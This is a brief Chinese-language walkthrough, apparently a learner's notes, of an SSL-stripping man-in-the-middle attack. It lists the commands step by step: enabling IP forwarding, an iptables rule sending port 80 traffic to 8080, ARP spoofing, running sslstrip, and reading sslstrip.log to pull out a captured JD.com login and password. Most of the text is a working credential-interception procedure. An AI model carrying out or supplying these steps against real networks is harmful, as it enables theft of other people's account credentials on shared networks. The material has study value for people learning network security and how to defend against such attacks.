具体操作的截图我只截了几张,因为弄过很多次了,所以就不再重复了
1. echo 1 >/proc/sys/net/ipv4/ip_forward
(这条命令的意思我百度了一下好像是开启ip转发功能)
2. 配置路由表,把80端口的数据传送到8080端口,也就是SSL欺骗需要监听的端口
具体指令:iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080(这个我背不到,一直都是复制的)
3. 开始arp欺骗
具体指令见 使用arp欺骗造成目标断网 那一节截取图片
4. 开始监听:sslstrip -l 8080
当时这步是成功了的,我也用的京东当例子,https变成了http
5. 在浏览器内登录账号以及密码
这个也没截图,只有最后的几张截图(忘了)
6. 打开终端输入:cat sslstrip.log
然后就出来
这么大一堆。。。
艰难的定位到了我账号的地方,有两个。。
前面那个后面没有东西,所以应该是第二个的位置,这个后面是loginpwd,所以应该是没错
(其实这应该是一节疑问大全。。。。)